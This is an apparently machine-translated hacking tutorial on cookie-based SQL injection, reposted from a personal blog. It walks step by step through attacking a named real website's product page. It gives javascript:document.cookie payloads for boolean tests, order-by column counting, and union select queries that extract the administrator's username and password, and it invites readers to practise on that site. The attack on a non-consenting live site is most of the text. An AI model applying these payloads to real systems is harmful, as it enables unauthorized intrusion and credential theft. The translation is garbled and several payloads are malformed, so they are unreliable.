Cookie injection Principle

Www.2cto.com: cookie injection is the Foundation. This question is not specifically addressed in the website.

Today, I encountered a website that can be injected with cookies during the website bypass. In addition, my personal website does not seem to have mentioned cookie injection in my previous articles, so today, we will use an instance website to tell you how to manually inject cookies.

Cookie injection works in the same way as normal injection. It means that the submitted parameter has been submitted in cookie mode. In general, we use get or post for injection, the get method is to directly add the statement to be injected after the URL, and the post method is through the form, the difference between get and post is that we can see the parameters we submitted in the IE address bar, but not the other.

Compared with post and get injection, cookie injection is a little complicated. To perform cookie injection, we need to modify the cookie first. Here we need to use the Javascript language. In addition, there are two conditions for cookie injection. Condition 1 is that the program filters the data submitted in the get and post methods, but does not filter the database submitted by the cookie. On the basis of condition 1, the program also needs to directly request ("xxx") the method for obtaining the submitted data, without specifying the specific method for obtaining the request object.

The following is a specific example to show you, the target site: http://www.bkjia.com/Products_show.asp? Id = 284

 

Is also the injection point. First, we need to detect the injection according to the usual method, and add and 1 = 1 to the URL.
 

It can be seen that the anti-injection system is used, but currently we use the get method to submit parameters, now we will use the "id = 284" parameter to submit it using cookies to see if the program directly uses the request ("xx") method to receive data? To change to cookie-based commit, we first need to access the normal page, that is: http://www.bkjia.com/Products_show.asp? Id = 284. After the page is fully opened, we clear the IE Address Bar and write: javascript: alert (document. cookie = "id =" + escape ("284"); here "id =" is "Products_show.asp? "Id =" in id = 284 "," 284 "in" escape ("284") "is" Products_show.asp? Id = 284 in id = 284, which must be defined according to the actual situation. After writing, press Enter. The following dialog box is displayed:
 

Now that we have changed the cookie, we have to try to access it normally. Now in another window, we open the following address: http://www.bkjia.com/Products_show.asp? Remove "id = 284" and check whether the access is normal.
 

See the accessed pages with access to http://www.bkjia.com/Products_show.asp? Id = 284 is the same, which means that the program does not specify the specific method to obtain data when using the request object, but directly uses request ("xx "). Now an important factor in cookie formation has been clarified. Next we will test whether we can submit special characters to check whether the program filters data. Go back to the cookie modification page and enter javascript: alert (document. cookie = "id =" + escape ("284 and 1 = 1"); Press enter and go to the http://www.bkjia.com/Products_show.asp? Page refresh to see if the page is normal. If it is normal, submit javascript: alert (document. cookie = "id =" + escape ("284 and 1 = 2"); then refresh the page, and an error occurs.
 

Obviously, the error is displayed, and the product content is also displayed. You can confirm that the page can be injected with cookies, the subsequent exploitation process is the same as normal injection. We can use union to query the Administrator's account and password, but the premise is that the Administrator's table name and field name need to be known, but we can guess it.

First, use the order by statement to determine the number of fields in the table currently being queried by the database. We submit: javascript: alert (document. cookie = "id =" + escape ("284 order by 1"); however, it will be normal, indicating that the order by statement can be used, if the error occurs, it may be that order by cannot be used to guess the number of fields. If this is the case, you need to directly run the union select command one by one. Then submit: javascript: alert (document. cookie = "id =" + escape ("284 order by 10"); If the returned result is normal, the number of fields is greater than 10, let's wait until we guess the correct number of fields. For example, an error occurred when I submitted the page to 21, and then refreshed the page when I submitted the page to 20, the number of fields is 20.

Next we will submit: javascript: alert (document. cookie = "id =" + escape ("284 union select, from manage ")); if an error is found, submit javascript: alert (document. cookie = "id =" + escape ("284 union select, from admin ")); A normal page is returned.

See the familiar figure. This indicates that the website database has the admin table, because we submitted javascript: alert (document. cookie = "id =" + escape ("284 union select, from manage "));, if the table mange does not exist in the database, an error occurs. You can use the replace from field to explain the problem, now, let's try username and password in places 6 and 17 to see if an error has occurred after submission. If an error occurs, it indicates that the username or password field does not exist. We submit: javascript: alert (document. cookie = "id =" + escape ("284 union select, 5, username, from admin "));
 

It can be seen that the Administrator's account and password are disclosed in areas 6 and 17, but the password cannot be broken. You can use the website to practice it on your own. In general, cookie injection is the same as normal injection, but the process of submitting the injection statement is different. If you understand the principles of common injection, it is not difficult to inject cookies.

From R4bb17's Blog